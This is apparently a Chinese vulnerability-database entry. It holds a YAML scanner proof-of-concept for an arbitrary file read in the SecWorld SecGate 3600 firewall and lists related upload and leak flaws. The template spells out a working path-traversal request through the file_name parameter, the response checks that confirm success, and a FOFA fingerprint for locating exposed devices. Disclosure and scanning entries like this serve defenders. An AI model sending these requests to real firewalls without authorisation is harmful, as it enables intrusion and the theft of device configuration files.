secworld-secgate3600-obj-area-export-save-fileread: 网神SecGate 3600 防火墙 obj_area_export_save 任意文件读取

漏洞描述

PoC代码[已公开]

id: secworld-secgate3600-obj-area-export-save-fileread

info:
  name: 网神SecGate 3600 防火墙 obj_area_export_save 任意文件读取
  author: Observer
  severity: high
  verified: true
  description: |
    FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
  tags: secworld,fileread
  created: 2023/12/07

rules:
  r0:
    request:
      method: GET
      path: /?g=sys_export_conf_local_save&file_name=../modules/system/import_export.mds
    expression: |
      response.status == 200 && 
      response.headers['content-type'].contains('application/octet-stream') && 
      response.headers['content-disposition'].contains('modules/system/import_export.mds')
expression: r0()

相关漏洞推荐

• POCsecgate-3600-obj-app-upfile-fileupload: 网神SecGate 3600防火墙index任意文件上传
• POCsecworld-secgate3600-obj-area-import-save-fileupload: 网神SecGate 3600 防火墙obj_area_import_save任意文件上传漏洞
• POCsecworld-secgate3600-obj-av-import-save-fileupload: 网神SecGate 3600 防火墙obj_av_import_save任意文件上传漏洞
• POCsecworld-secgate3600-objappupfile-uploadfile: 网神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞
• POCsecgate-3600-file-upload: SecGate 3600 Firewall obj_app_upfile - Arbitrary File Upload
• 无POC网神 SecGate 3600 防火墙 /?g=route_ispinfo_import_save 文件上传漏洞
• 无POC网神-SecGate-3600-防火墙 libcommon 信息泄露漏洞
• 无POC网神SecGate 3600防火墙 sec_web_auth_custom_setting_confsave 文件上传漏洞
• 无POC网神SecGate 3600防火墙 sys_hand_upfile 任意文件上传漏洞
• 无POC网神 SecGate 3600 防火墙 route_ispinfo_import_save 任意文件上传漏洞
• POC网神SecGate 3600 防火墙sys_hand_upfile 任意文件上传漏洞
• 无POC网神 SecGate 3600 防火墙 sec_ssl_agent_import_save 任意文件上传漏洞
• 无POC网神SecGate 3600防火墙 文件上传漏洞